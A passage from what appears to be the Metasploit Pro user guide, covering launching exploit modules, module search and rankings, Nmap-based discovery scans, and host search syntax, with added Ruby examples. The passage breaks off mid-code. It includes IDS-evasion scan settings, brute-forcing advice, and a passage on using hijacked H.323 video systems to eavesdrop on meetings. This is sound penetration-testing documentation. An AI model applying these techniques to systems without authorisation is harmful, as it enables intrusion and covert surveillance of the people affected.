2. Use the search engine to find a module. You can utilize the keywords to either narrow down your search or to find a specific module. For example, if you want to search for Windows exploits, you can search for platform:windows, or if you want to search specifically for the ms08-067 exploit, you can search for path:ms08_067_netapi.


3. After you find the module that you want to use, click on the module name to open the configuration page.

4. At a minimum, you should define the IP addresses of the target systems that you want to include in or exclude from the exploit. If you do not specify any target addresses, Metasploit Pro includes all hosts that are in the project.

5. Optionally, you can define any advanced options and evasion options that are available.

Note: The options that are available vary between different modules. By default, each module is preconfigured with default settings that are appropriate for you to run against a target. The payloads will be preselected based on the intended target. For example, Metasploit Pro will use Meterpreter for Windows targets and the command shell for Linux/UNIX targets.

6. After you configure the options for the module, click the Run Module button to launch the module.


Module Search
The module search engine searches the module database for the search term and returns a list of results that match the query. Use the module search engine to find the module that you want to run against a target. You can utilize keyword tags to perform a targeted search. This reduces the number of results that the system returns.

Keyword Tags
You can use keyword tags to define a keyword expression. A keyword tag is a keyword that helps you efficiently search for a module. If you want to search for a module that has a specific author, you can use the author tag to search for modules written by them. Likewise, if you know that the CVE ID of the exploit you want to use is 2008-4250, you can search for CVE:2008-4250. This search returns an exploit for the ms08-067 vulnerability. The following table lists the keyword tags:

app - Searches for modules that are either a client or server attack. Example: app:client

author - Searches for modules by author. Example: author:hdm

bid - Searches for modules by Bugtraq ID. Example: bid:10078

cve - Searches for modules by CVE ID. Example: cve:2009

name - Searches for the keyword expression within the module descriptive name. Example: name:Java

osvdb - Searches for modules by OSVDB ID. Example: osvdb:875

platform - Searches for the modules that affect the platform or target that you define in the keyword expression. Example: platform:linux


path - Searches for the keyword expression within module path name. Example: path:windows/smb

type - Searches for the modules that belong to the module type that you define in the keyword expression. For example, use exploit, auxiliary, or post. Example: type:exploit
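As an added example (not the Framework's search code), the following Ruby models the tag syntax above over a constructed module index: each tag:value term matches its field as a case-insensitive substring (so cve:2009 matches any 2009 CVE and path:windows/smb matches anywhere in the path), several terms are combined with AND, and a bare word searches the module name. Apart from the ms08_067_netapi path, CVE 2008-4250 and the author hdm, which this section mentions, every path, author and reference id in the index is a constructed placeholder.

```ruby
# Added example, not Metasploit code: a model of the keyword-tag search.
# Matching is case-insensitive substring matching on the tagged field; terms are
# ANDed together (an assumption about the real engine, not stated in the guide).

# The keyword tags listed in the guide's table.
TAGS = %w[app author bid cve name osvdb platform path type].freeze

# Constructed module index. Only ms08_067_netapi, CVE 2008-4250 and hdm appear
# in the guide; every other path, author and reference id is a placeholder.
MODULE_INDEX = [
  { type: 'exploit', path: 'exploit/windows/smb/ms08_067_netapi',
    name: 'MS08-067 Server Service exploit (sample title)',
    author: %w[hdm], cve: %w[2008-4250], platform: %w[windows], app: 'server' },
  { type: 'exploit', path: 'exploit/multi/browser/java_sample_client',  # placeholder path
    name: 'Java Sample Client Exploit (constructed)',
    author: %w[sample_author], cve: %w[2009-0000], bid: %w[00000],      # placeholder ids
    platform: %w[windows linux osx], app: 'client' },
  { type: 'auxiliary', path: 'auxiliary/fuzzers/ftp/sample_fuzzer',     # placeholder path
    name: 'Sample FTP Fuzzer (constructed)', author: %w[sample_author] },
  { type: 'post', path: 'post/linux/gather/sample_enum',                # placeholder path
    name: 'Sample Linux Enumerator (constructed)', author: %w[another_author],
    platform: %w[linux] }
].freeze

# Turn "platform:windows type:exploit Java" into [[tag, value], ...].
# A bare word is a name search; an unknown tag is an error rather than a silent miss.
def parse_query(query)
  query.split.map do |term|
    tag, value = term.split(':', 2)
    next ['name', tag] if value.nil?
    tag = tag.downcase
    raise ArgumentError, "unknown keyword tag: #{tag}" unless TAGS.include?(tag)
    [tag, value]
  end
end

# Does one module satisfy one term? Array fields match if any element does;
# a module that lacks the field never matches it.
def term_matches?(mod, tag, value)
  needle = value.downcase
  Array(mod[tag.to_sym]).any? { |v| v.to_s.downcase.include?(needle) }
end

# Module paths matching every term of the query, in index order.
def search_modules(query, index = MODULE_INDEX)
  terms = parse_query(query)
  index.select { |mod| terms.all? { |tag, value| term_matches?(mod, tag, value) } }
       .map { |mod| mod[:path] }
end

if __FILE__ == $PROGRAM_NAME
  puts search_modules('CVE:2008-4250').inspect   # => ["exploit/windows/smb/ms08_067_netapi"]
  puts search_modules('platform:windows app:client').inspect
end
```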


Module Statistics
Module statistics show the total number of modules that are available and show the number of modules that are available for each type of module. Module types include exploit modules, auxiliary modules, server-side exploits, and client-side exploits.

Viewing Module Statistics


1. From within a project, select Modules > Search.

2. Click the Show link located next to the Module Statistics. A list of module types and their statistics will display. You can see the total number of modules that are available in the Metasploit Framework, as well as a numerical breakdown of each module type, such as exploit modules, auxiliary modules, and post-exploitation modules.


Module Rankings
Module rankings provide details about the reliability and impact of an exploit on a target system. Every module in the Metasploit Framework has a ranking, which is based on how likely the exploit will disrupt the service. There are six possible rankings. The higher rankings indicate that the exploit is less likely to cause instability or crash the target system. Use the following rankings to determine the reliability of a module:
- Low - The exploit is unstable and unlikely to be successful. Do not use exploits with a low ranking.
- Average - The exploit can be unstable and unreliable. Do not use exploits with an average ranking.
- Normal - The exploit is generally reliable, but cannot auto-detect the default target.
- Good - The exploit has a default target.
- Great - The exploit has a default target and can automatically detect the correct target.
- Excellent - The exploit never crashes the service. Examples of exploits that have an excellent ranking are SQL injections and CMD executions.


Chapter 7: Scanning

To learn more about scanning, read the following topics:


- About Scanning on page 126
- Discovery Scans on page 127
- Discovery Scan Tasks on page 135

About Scanning
Before you can begin the exploitation phase of a penetration test, you must add host data to the project. Host data refers to the IP addresses of the systems that you want to exploit and the active ports, services, and vulnerability information associated with those systems. To add host data to a project, you can either run a discovery scan or you can import scan data from a vulnerability scanner, such as Nexpose or Nessus. If you import data from a vulnerability analysis tool, or some other third-party vendor, you should still run a discovery scan to identify new or additional information for those hosts. A discovery scan is the port scanner included with Metasploit Pro. It combines Nmap with several modules to identify the systems that are alive and to uncover the open ports and services. A port is a data connection that serves as a gateway for communication and enables traffic to travel between systems. Network services, like SSH, telnet, and HTTP, typically run on standard port numbers and can indicate the purpose of the system. You can use the results to filter the list of attackable targets. For example, if you discover a service that allows remote code execution, like VNC, you can bruteforce the service to attempt to log into the system.


Discovery Scans
One of the first steps in penetration testing is reconnaissance. Reconnaissance is the process of gathering information to obtain a better understanding of a network. It enables you to create a list of target IP addresses and devise a plan of attack. Once you have a list of IP addresses, you can run a discovery scan to learn more about those hosts. A discovery scan identifies the operating systems that are running on a network, maps those systems to IP addresses, and enumerates the open ports and services on those systems. A discovery scan is the internal Metasploit scanner. It uses Nmap to perform basic TCP port scanning and runs additional scanner modules to gather more information about the target hosts. By default, the discovery scan includes a UDP scan, which sends UDP probes to the most commonly known UDP ports, such as NETBIOS, DHCP, DNS, and SNMP. The discovery scan tests approximately 250 ports that are typically exposed for external services and are more commonly tested during a penetration test. During a discovery scan, Metasploit Pro automatically adds the host data to the project. You can review the host data to obtain a better understanding of the topology of the network and to determine the best way to exploit each target. Oftentimes, the network topology provides insight into the types of applications and devices the target has in place. The more information that you can gather about a target, the more it will help you fine-tune a test for it.

Data Gathered during a Discovery Scan


A discovery scan gathers the following information from a host:
- The host status
- The operating system
- The open ports
- The running services

How a Discovery Scan Works


A discovery scan can be divided into four distinct phases: ping scan, port scan, OS and version detection, and data import. The first phase of a discovery scan, ping scanning, determines if the hosts are online. The discovery scan sets the -PI option, which tells Nmap to perform a standard ICMP ping sweep. A single ICMP echo request is sent to the target. If there is an ICMP echo reply, the host is considered up or online. If a host is online, the discovery scan includes the host in the port scan.


During the second phase, port scanning, Metasploit Pro runs Nmap to identify the ports that are open and the services that are available on those ports. Nmap sends probes to various ports and classifies the responses to determine the current state of the port. The scan covers a wide variety of commonly exposed ports, such as HTTP, telnet, SSH, and FTP. The discovery scan uses the default Nmap settings, but you can add custom Nmap options to customize the Nmap scan. For example, the discovery scan runs a TCP SYN scan by default. If you want to run a TCP Connect Scan instead of a TCP SYN Scan, you can supply the -sT option. Any options that you specify override the default Nmap settings that the discovery scan uses. After the discovery scan identifies the open ports, the third phase begins. Nmap sends a variety of probes to the open ports and detects the service version numbers and operating system based on how the system responds to the probes. The operating system and version numbers provide valuable information about the system and help you identify a possible vulnerability and eliminate false positives. Finally, after Nmap collects all the data and creates a report, Metasploit Pro imports the data into the project. Metasploit Pro uses the service information to run additional modules that target the discovered services and to probe the target for more data. For example, if the discovery scan sweeps a target with telnet probes, the target system may return a login prompt. A login prompt can indicate that the service allows remote access to the system, so at this point, you may want to run a bruteforce attack to crack the credentials.

Ports Included in the Discovery Scan


By default, the discovery scan includes the following set of ports:
- Standard and well-known ports, such as ports 20, 21, 22, 23, 25, 53, 80, and 443.
- Alternative ports for a service, such as ports 8080 and 8442, which are additional ports that HTTP and web services can use.
- Ports listed as the default port in a module.

In total, the discovery scan includes over 250 ports. If you do not see the port that you want to scan, you can manually add the port to the discovery scan. For example, if you know that your company runs web servers with port 9998 open, you need to manually add port 9998 to the discovery scan. This ensures that the discovery scan includes every port that is potentially open. If you want to scan all ports, you can specify 1-65535 as the port range. Keep in mind that a discovery scan that includes all ports can take several hours to complete. If there is a port that you do not want to scan, you can exclude the port from the discovery scan. The discovery scan will not scan any ports on the excluded list. For example, if your company uses an application that runs on port 1234, and you do not want to affect the application's performance, you can add the port to the excluded list.

Supported Scan Data Types


Metasploit Pro supports the import of scan data from vulnerability analysis tools, like Nexpose, other penetration testing tools, like Core Impact, and non-vulnerability analysis products, like PWDump files. If you want to use the scan data in your penetration test, you can import the reports or scan data files into Metasploit Pro. Metasploit Pro supports the following formats:
- Metasploit PWDump Export
- Metasploit Export XML
- Metasploit Export ZIP
- NeXpose XML or XML 2.0
- NeXpose Raw XML or XML Export
- Foundstone Network Inventory XML
- Microsoft MBSA SecScan XML
- nCircle IP360 (XMLv3 and ASPL)
- NetSparker XML
- Nessus NBE
- Nessus XML (v1 and v2)
- Qualys Asset XML
- Qualys Scan XML
- Burp Session XML
- Acunetix XML
- AppScan XML
- Nmap XML
- Retina XML
- Amap Log
- IP Address List
- Libpcap Network Capture
- Spiceworks Inventory Summary CSV
- Core Impact XML

Raw XML is only available in commercial editions of Nexpose and includes additional vulnerability information. Note: Metasploit Pro does not import service and port information from Qualys Asset files. If you import a Qualys Asset file, you must run a discovery scan to enumerate services and ports that are active on the imported hosts.

Discovery Scan Options


You can configure the following options for a discovery scan.

Target addresses
Defines the individual hosts or network range that you want to scan.

Perform initial port scan


Performs a port scan before the discovery scan performs service version verification.

Custom Nmap arguments


Sends flags and commands to the Nmap executable. Discovery scan does not support the following Nmap options: -o, -i, -resume, -script, -datadir, and -stylesheet.

Additional TCP ports


Appends additional TCP ports to the port scan. By default, the port scan covers a small, but wide range of ports. Use this option if you want to add more ports to the scan.

Excluded TCP ports
Excludes certain TCP ports from service discovery. By default, the port scan covers a specific range of ports. Use this option to add a port that you want to exclude from the scan.

Custom TCP port range


Specifies a range of TCP ports for the discovery scan to use instead of the default ports. If you set a custom TCP port range, the discovery scan ignores all default ports and uses the range that you define instead.

Custom TCP source range


Specifies the TCP source port that the discovery scan uses instead of the default port. Use this option to test firewall rules.

Fast detect: Common TCP ports only


Performs a scan on the most common TCP ports, which reduces the number of ports that the discovery scan scans.

Portscan speed
Controls the Nmap timing option. Choose from the following timing templates:
- Insane (5) - Speeds up the scan. Assumes that you are on a fast network and sacrifices accuracy for speed. Scan delay is less than 5 ms.
- Aggressive (4) - Speeds up the scan. Assumes that you are on a fast and reliable network. Scan delay is less than 10 ms.
- Normal (3) - The default port scan speed. Does not affect the scan.
- Polite (2) - Uses less bandwidth and target resources to slow the scan.
- Sneaky (1) - Use this port scan speed for IDS evasion.
- Paranoid (0) - Use this port scan speed for IDS evasion.

Portscan timeout
Determines the amount of time Nmap spends on each host. The default value is 5 minutes.

UDP service discovery
Sets the discovery scan to find all services that are on the network. Metasploit uses custom modules instead of Nmap to perform UDP service discovery.

Scan SNMP community strings


Launches a background task that scans for devices that respond to a variety of community strings.

Scan H.323 video endpoints


Scans for H.323 devices.


Enumerate users via finger


Queries user names and attempts to bruteforce the user list if the discovery scan detects the Finger protocol.

Identify unknown services


Sets the discovery scan to find all unknown services and applications on the network.

Single scan: scan hosts individually


Runs a scan on individual hosts. The discovery scan scans the first host entirely and stores the information in the database before it moves onto the next host.

Dry run: only show scan information


If enabled, this option prepares the scan and shows all of the options that the Discovery Scan will use in the task log. However, it does not launch the scan.

Web scan: run the Pro Web Scanner


Automatically runs a web scan, web audit, and web exploit along with a discovery scan. It is generally recommended that you do not enable this option unless you are running a scan against a very small set of hosts. If you are running a discovery scan against a large number of hosts, you should run the web scanner separately from the discovery scan.

SMB user name


Defines the SMB user name that the discovery scan uses to attempt to log in to SMB services.

SMB password
Defines the SMB password that the discovery scan uses to attempt to log in to SMB services.

SMB domain
Defines the SMB server name and share name.
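As an added Ruby example, not Metasploit Pro's own code, here is how the option rules in this section (default ports plus additions minus exclusions, a custom range that replaces the defaults, the unsupported custom-argument list, the Portscan speed templates, a custom TCP source port and the Portscan timeout) could be composed into an Nmap argument list. The flags -sS, -p, -g, -T and --host-timeout are standard Nmap options, but mapping these settings onto them is my modelling, and the ten-port default list stands in for the product's 250+ port list.

```ruby
# Added example, not Metasploit Pro code: compose an Nmap argument list from the
# discovery scan options described above. -sS, -p, -g, -T and --host-timeout are
# standard Nmap flags; choosing them for these options is my modelling, and the
# ten-port default list below stands in for the product's 250+ port list.

# Ports the guide names explicitly as part of the default set.
DEFAULT_TCP_PORTS = [20, 21, 22, 23, 25, 53, 80, 443, 8080, 8442].freeze

# Custom Nmap arguments the guide says the discovery scan does not support.
UNSUPPORTED_NMAP_OPTIONS = %w[-o -i -resume -script -datadir -stylesheet].freeze
# -o and -i take a format letter in Nmap (-oX, -oN, -iL ...); treat the whole
# family as covered by the guide's "-o" and "-i" (an assumption here).
FAMILY_OPTIONS = /\A-(o[NXGAS]?|i[LR]?)\z/

# "Portscan speed" templates mapped to Nmap's -T level, per the guide's numbering.
PORTSCAN_SPEED = { 'paranoid' => 0, 'sneaky' => 1, 'polite' => 2,
                   'normal' => 3, 'aggressive' => 4, 'insane' => 5 }.freeze

# Expand "22,80,8000-8010" into a sorted, de-duplicated array of ports.
def expand_ports(spec)
  return [] if spec.nil? || spec.strip.empty?
  spec.split(',').flat_map do |part|
    lo, hi = part.strip.split('-', 2).map { |p| Integer(p, 10) }
    hi ||= lo
    valid = (1..65535).cover?(lo) && (lo..65535).cover?(hi)
    raise ArgumentError, "bad port range #{part.strip.inspect}" unless valid
    (lo..hi).to_a
  end.uniq.sort
end

# Final TCP port set. A custom range replaces the defaults (the guide's rule);
# additional ports are appended and excluded ports removed in either case (the
# guide states this only for the default set, so that part is an assumption).
def tcp_ports(additional: nil, excluded: nil, custom_range: nil)
  base = custom_range ? expand_ports(custom_range) : DEFAULT_TCP_PORTS
  (base + expand_ports(additional) - expand_ports(excluded)).uniq.sort
end

# Reject the custom arguments the guide lists as unsupported, in either -x or
# --x spelling and with or without "=value"; everything else passes through.
def validate_custom_args(custom)
  tokens = custom.to_s.split
  tokens.each do |tok|
    name = tok.sub(/\A--/, '-').split('=', 2).first
    banned = UNSUPPORTED_NMAP_OPTIONS.include?(name) ||
             name.match?(FAMILY_OPTIONS) || name.start_with?('-script-')
    raise ArgumentError, "Nmap option #{tok} is not supported by the discovery scan" if banned
  end
  tokens
end

# Assemble the argument list; custom arguments override the defaults they
# replace, as the guide states (for example -sT instead of the default -sS).
def build_nmap_args(targets, speed: 'normal', timeout_minutes: 5, source_port: nil,
                    custom_args: nil, **port_opts)
  level = PORTSCAN_SPEED.fetch(speed.to_s.downcase) { raise ArgumentError, "unknown speed #{speed}" }
  custom = validate_custom_args(custom_args)
  args = []
  args << '-sS' unless custom.any? { |t| t.match?(/\A-s[STAWMNFX]/) } # TCP scan technique
  args << '-PI'                                                      # ICMP echo sweep named in the guide
  args.concat(['-p', tcp_ports(**port_opts).join(',')])
  args.concat(['-g', source_port.to_s]) if source_port                # "Custom TCP source range"
  args << "-T#{level}" unless custom.any? { |t| t.start_with?('-T') }
  args.concat(['--host-timeout', "#{timeout_minutes}m"])             # "Portscan timeout", 5 minutes default
  args.concat(custom)
  args.concat(Array(targets))
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample: a TCP connect scan from source port 1720 with one port excluded.
  puts build_nmap_args('192.168.184.0/24', speed: 'aggressive', source_port: 1720,
                       excluded: '8442', custom_args: '-sT').join(' ')
end
```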

IPv6 Addresses
Metasploit Pro does not automatically detect IPv6 addresses during a discovery scan. For hosts with IPv6 addresses, you must know the individual IP addresses that are in use by the target devices and specify those addresses to Metasploit Pro. To identify individual IPv6 addresses, you can use SNMP, Nmap, or thc-alive6, which is part of the thc-ipv6 toolkit. After you identify the IPv6 addresses for the target devices, you can either import a text file that contains the host addresses into a project or manually add the hosts to a project. If you choose to import the addresses, the text file that you use must list each IPv6 address on a new line. To import a host address file, select Analysis > Hosts > Import. When the Import Data window appears, browse to the location of the host address file and import the host address file. To manually add a host, select Analysis > Hosts > New Host.

Virtual Host Discovery


During a discovery scan, Metasploit Pro will detect any guest operating systems, or virtual machines, on the target system. Metasploit Pro displays a list of virtual machines on the host page and denotes the virtual machine with a VM icon. For example, a machine that runs VMware ESX displays the VMware icon and the guest operating system and version. Use this information to differentiate between real machines and virtual machines.

Supported Host VM Servers


Metasploit Pro supports the following host VM servers:
- VMware ESXi 3.5, 4.0, 4.1, and 5.0
- VMware ESX 1.5, 2.5, 3.0, and 4.0
- vCenter

Supported Guest Operating Systems


Metasploit Pro supports the following guest operating systems:
- VMware
- Xen
- BreakingPoint
- Virtual PC
- Virtual Iron
- QEMU
- VirtualBox


Compromised Virtual Systems


If you gain access to a target system that runs a virtual environment, Metasploit Pro captures screenshots of the guest operating systems on the host system. To view the screenshots of the guest operating systems, go to Analysis > Hosts > Captured Evidence. The Captured Evidence tab displays a list of looted evidence, such as screenshots from virtual machines.


Discovery Scan Tasks


You can perform the following tasks with the discovery scan:
- Running a Discovery Scan
- Viewing the Results from a Discovery Scan
- Importing Scan Data

Running a Discovery Scan


A discovery scan runs Nmap along with a few service-specific modules to identify the systems that are alive and to find the open ports and services. At a minimum, you need to specify the addresses of the systems that you want to include in the scan. There are advanced options that you can configure as well to fine-tune the different scan phases. For example, you can bypass the port scanning phase and move onto version detection, or you can scan each host individually to accelerate the import of hosts into the project. Additionally, these advanced settings let you choose the ports, the target services, the scan speed, and the scan mode. Since the discovery scan mostly leverages Nmap, you can specify additional Nmap options to customize the scan. For example, if you want to change the scanning technique, you can provide the Nmap command line option for the technique that you want to use, and the discovery scan applies those settings instead of the default ones. For more information on Nmap options, visit the Nmap documentation.

1. From within a project, click the Overview tab.

2. When the Overview page appears, click the Scan button.

3. When the New Discovery Scan window displays, enter the target addresses that you want to include in the scan in the Target addresses field. You can enter a single IP address, an address range, or a CIDR notation. If there are multiple addresses or address ranges, use a newline to separate each entry.


4. At this point, you can launch the scan. However, if you want to fine-tune the scan, you can click the Show Advanced Options button to display additional options that you can set for the discovery scan. For example, you can specify the IP addresses that you want to explicitly include and exclude from the scan.
5. When you are ready to run the scan, click the Launch Scan button.

Scanning for H.323 Conferencing Systems


You can enable the discovery scan to search for H.323 systems that have auto-answer turned on. If you enable the H.323 scan option, the discovery scan runs the H.323 scanner module, which identifies any video conferencing systems in the target range. Access to a video conferencing system enables you to remotely control the camera to monitor the surrounding areas. For example, after you obtain access to an H.323 system, you can listen to any meetings that take place near the system or use the camera to zoom in on any nearby paperwork.

1. From within a project, click the Overview tab.
2. When the Overview page appears, click the Scan button.

3. When the New Discovery Scan window displays, enter the target addresses that you want to include in the scan in the Target addresses field. You can enter a single IP address, an address range, or a CIDR notation. If there are multiple addresses or address ranges, use a newline to separate each entry.


4. Click the Show Advanced Options button.
5. In the Custom TCP source port field, enter 1720.

6. Deselect the UDP service discovery option.


7. Select the Scan H.323 video endpoints option. By default, this option is enabled.
8. Click the Launch Scan button.

Defining Nmap Arguments


The discovery scan runs with the following Nmap options turned on: -sS -T5 -PP -PE -PM -PI -PA. If you want to override the default options or add scan options, you can define a list of Nmap command line options. The options that you define take precedence over any internal, default setting. Typically, you add Nmap options to perform custom scanning techniques and modify scan speeds. For example, if you want to perform a ping scan, you may want to specify -sn so that the scan does not run a port scan.

Note: The discovery scan supports most Nmap options except for -o, -i, -resume, -datadir, and stylesheet.

1. From within a project, click the Overview tab.
2. When the Overview page appears, click the Scan button.

3. When the New Discovery Scan window displays, enter the target addresses that you want to include in the scan in the Target addresses field. You can enter a single IP address, an address range, or a CIDR notation. If there are multiple addresses or address ranges, use a newline to separate each entry.

4. Click the Show Advanced Options button.
5. Under the Advanced Target Settings, find the Custom Nmap arguments field.


6. In the Custom Nmap arguments field, enter the Nmap arguments you want to use.

Note: Any command line arguments that you specify take precedence over the default configuration that Metasploit Pro uses for the discovery scan.

7. Optionally, you can define any advanced options that are available. For example, you can specify the IP addresses that you want to include and exclude from the scan, as well as the target ports, services, scan speed, and scan mode for the discovery scan.
8. When you are ready to run the scan, click the Launch Scan button.

Viewing the Results from a Scan


The Hosts page lists all the hosts that communicated with your machine and the services, notes, vulnerabilities, and evidence associated with each host. The Hosts page also lists the hosts that you imported or manually added to the project. To view the results of a discovery scan, go to Analysis > Hosts.


Host Management
A host refers to a target machine that you scanned, imported, or manually added to a project. At a minimum, each host has an IP address, a list of active services, and system information. You can manually add a host to a project if you do not have import data for it or if the discovery scan cannot communicate with it. You can configure the details for the host, which includes the network, operating system, and service information. Additional information you can define includes vulnerability information, host comments, and host tags.


Advanced Search
When you perform a basic search, Metasploit searches all columns in the hosts table. Oftentimes, the search may not be specific enough and returns records that are false positives. For example, if you perform a basic search for Windows, the results may include all hosts that have Windows somewhere in the description, and not only hosts that are Windows machines. To work around false positives, you can perform an advanced search. In an advanced search, you specify exactly where in the hosts table you want the search to look. This is particularly useful when you want to narrow the results to a specific subset of data.

Parts of an Advanced Search Query


An advanced search query is made up of three parts:
- Search Filter - Refers to the column in the table where you want the search to look.
- Search Operator - Refers to the operators that you can add to narrow or broaden a search query. A search operator is also known as a connector.
- Keyword - Refers to a single word or phrase that the search uses to find matching records.

To create an advanced search query, you need to first specify the search filter, followed by the search operator and keyword. Going back to the previous example, if you want to only see hosts that are Windows specific machines, you would use the following search query: os:windows. This query ensures that the search only looks in the OS column of the hosts tables for the Windows keyword and only returns hosts that have been fingerprinted as Windows systems.

Search Operators
Metasploit Pro provides several different types of search operators that you can use to refine your host search. The search operator that you need to use depends on the type of data that you want the search to find.

Text Operators
You should use text operators when you want to perform a full-text search. Typically, you use text operators when you search for any data other than ports or IP addresses.

Like Operator (:) - Add the LIKE operator to a search query to include all records that have the keyword in the specified column. For example, if you search for os:windows, the search shows any hosts with the keyword, Windows, in the OS field.

Not Like Operator (!:) - Add the NOT LIKE operator to a search query to exclude records that have the keyword in the specified column. For example, if you search for os!:windows, the search does not return any records that contain the keyword, Windows, in the OS field.

Equals Operator (=) - Add the EQUALS operator to a search query to return an exact match. For example, if you search for os=Windows, the search shows all hosts that match the keyword, Windows, in the OS field. However, if the operating system for the host is listed as Microsoft Windows, these records will not appear in the results because they do not match the query exactly.

Not Equals Operator (<>) - Add the NOT EQUALS operator to exclude records that contain the keyword. For example, if you search for os<>Windows, the search excludes hosts that exactly match the keyword, Windows, in the OS field. However, if the operating system for the host is listed as Microsoft Windows, these records will appear in the results because they do not match the query.

And Operator (&&) - Add the AND operator to a query to combine multiple keywords or search criteria. The AND operator requires that all the keywords or search criteria appear in the results. For example, if you search for os:windows && sp0, the search returns the hosts that match both criteria.

Or Operator (||) - Add the OR operator to a search query to include any of your search terms in the resulting records. You can use the OR operator to broaden your search. For example, if you search for os:Windows || ip:192.168, the search finds hosts that are running Windows or have an IP address that starts with 192.168. The hosts do not have to match both search criteria.

Numeric Operators
You should use numeric operators when you search for integer values or when you want to compare numeric values. Typically, you use numeric operators when you search for IP addresses or ports.

Equal Operator (= or :) - Add the equal operator to perform a mathematical equivalency check. For example, if you search for port:445, the search shows all services that are open on that port.

Not Equal Operator (<> or !:) - Add the not equal operator to perform a mathematical non-equivalency check. For example, if you search for port!:445, the search returns all services except those that are open on port 445.

Comparison Operator (<, <=, >, or >=) - Add a comparison operator to compare two values. For example, if you search for vulns>0, the search only shows hosts that have vulnerabilities.

Tag Operators
You should use tag operators when you search for host tags.

Hash Sign (#) - Append the hash sign to any host tag to search for hosts. For example, if you search for #windows, the search shows any hosts that have the windows host tag.

Search Filters
In Metasploit, a search filter refers to a column of data in the hosts table. You specify a search filter to specify where you want the search to look in the hosts table. For example, if you want to search for hosts based on the operating system, you should use the os search filter. The search filters that are available depend on the page that you are currently viewing in the Analysis area. When you perform a search, you can only use the search filters that are available for that specific page. Some search filters are global, such as hostname and OS; however, there are some that are specific to the page that you are viewing, such as proto or ref. There are five different pages that you can view from the Analysis area and each has its own set of search filters:
- Hosts
- Notes
- Services
- Vulnerabilities
- Captured Data

Read the following sections to learn more about the search filters that each page supports.

Hosts Page
The Hosts page enumerates all hosts that have been fingerprinted. To access the Hosts page, select Analysis > Hosts from the Tasks bar.

Hostname - Refers to the host name, or nickname, that uniquely identifies the machine.
OS - Refers to the operating system that runs on the host.
Version - Refers to the version of the operating system that the host runs, such as Windows 2000.
Purpose - Identifies whether the host is a client, server, or device.
IP - Refers to the IP address of a host.
Vulns - Identifies the number of vulnerabilities that have been identified for a host.
Services - Identifies the number of services that have been found for a host.

Notes Page
The Notes page shows any additional information that Metasploit was able to obtain from the hosts. Notes are bits of information that Metasploit is able to obtain from a host, but are not easily sorted into existing table columns. To access the Notes page, select Analysis > Notes from the Tasks bar.

Hostname - Refers to the host name, or nickname, that uniquely identifies the machine.
Type - Identifies the method or source used to obtain the note, such as from an import or fingerprint.
IP - Refers to the IP address of a host.
Data - Refers to the information stored in the note.

Services Page
The Services page shows all services that Metasploit was able to enumerate for open ports. To access the Services page, select Analysis > Services from the Tasks bar.

Hostname - Refers to the host name, or nickname, that uniquely identifies the machine.
Name - Refers to the services that are active on the port, such as DCERPC, HTTP, and SSH.
Proto - Refers to the protocol that the port runs, such as TCP or UDP.
Info - Identifies the operating system and version that the host runs.
IP - Refers to the IP address of a host.

Vulnerabilities Page
The Vulnerabilities page shows all vulnerabilities that Metasploit was able to identify for the hosts in a project. To access the Vulnerabilities page, select Analysis > Vulnerabilities from the Tasks bar.

Hostname - Refers to the host name, or nickname, that uniquely identifies the machine.
Info - Refers to the description of the vulnerability.
Ref - Refers to the vulnerability reference ID.
IP - Refers to the IP address of a host.
Name - Refers to the name of the vulnerability.

Captured Data Page


The Captured Data page lists all data that Metasploit was able to obtain from the hosts in a project. From this page, you can view and download captured data. To access the Captured Data page, select Analysis > Captured Data from the Tasks bar.

Hostname - Refers to the host name, or nickname, that uniquely identifies the machine.
Info - Refers to the description of the vulnerability.
IP - Refers to the IP address of a host.
Type - Refers to the captured data type, such as a shadow file, private or public key, or a process list.
Name - Refers to the name of the vulnerability.

Advanced Keyword Search Examples


The following sections provide some examples of searches that you may want to perform.


Searching for Services Running on a Specific Port


To search for services on port 445, enter the following query in the search field: port:445. The search returns all services for that port.

Searching for OS Specific Hosts


To search for Linux hosts, enter the following query in the search field: os:linux. The search returns hosts that have been fingerprinted as Linux systems.

Searching for Hosts with Known Vulnerabilities


To search for hosts that have vulnerabilities, enter the following query in the search field: vulns>0. The search returns any host that has at least one vulnerability.

Excluding Hosts from a Search


To exclude the host 10.0.0.2 from a search, enter the following query in the search field: ip!:10.0.0.2. The search displays all hosts except for the one that has been explicitly excluded.

Excluding a Range of Hosts


To exclude any host in the 10.0.0/24 range, enter the following query in the search field: ip!:10.0.0. The search displays all hosts except for the ones that fall into the range specified.

Searching for a Host Tag


To search for all hosts that have the host tag NexposeImport, enter the following query in the search field: #NexposeImport. The search returns any host that has been tagged with the NexposeImport host tag.

Nested Searches
Nesting is an advanced search strategy that enables you to build a more complex and precise search query. When you create a nested search query, you use parentheses to group search terms together with search operators and define the order in which they are processed. Each set of keywords that are enclosed in parentheses is processed as a single unit. Since Boolean logic operates on mathematical principles, the search expressions defined within parentheses take precedence over those that are not. If there is more than one set of parentheses, the innermost set of parentheses is processed first, then the next, and so on until the entire query has been interpreted. The search engine supports infinite levels of nesting.

Note: The AND operator takes precedence over the OR operator when the search query is parsed.


Nested Search Example


Let's say that you want to search for hosts that are Windows systems and are in the 192.168.1.0 or 192.168.2.0 subnets. If you enter a basic search query, such as os:windows && 192.168.1 || 192.168.2, the search parses the query from left to right. It searches for Windows systems that are in the 192.168.1.0 subnet or any system that is in the 192.168.2.0 subnet. This query does not return the results that you want. To get the results you want, you need to create a nested search query, so that you can group relevant keywords together and define the sequence in which each set of keywords are processed. Using the previous example, you can enter the following nested search query: os:windows && (192.168.1 || 192.168.2). This query first searches for hosts that fall into either of the specified subnets, and then parses those results down to Windows systems.

Multi-Level Nested Search Example


Now let's say that you want to fine-tune your search even further, and you want to find hosts that are Windows systems that are in the 192.168.1.0 or 192.168.2.0 subnets and have Service Pack 1 or 2 installed. In this case, you can use multiple levels of nesting. You can search for (os:windows && ((192.168.1 || 192.168.2) && (sp1 || sp2))). The search looks at the innermost set of parentheses first, which means it has to search for hosts that fall within one of the specified subnets and have Service Pack 1 or 2 installed. If there are hosts that match those conditions, the search then parses the resulting list for Windows systems.
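The operator descriptions and the nested search examples above, worked as runnable code: this is an added Ruby example, not Metasploit Pro's own search implementation, and the hosts table it searches is constructed sample data. It assumes that the LIKE operator is a case-insensitive substring match, that EQUALS is a case-insensitive exact match, and that a bare keyword is a basic search across all columns; AND is given precedence over OR as the note above states, and parentheses override that order.

```ruby
# Constructed sample hosts table; keys follow the Hosts page search filters.
HOSTS = [
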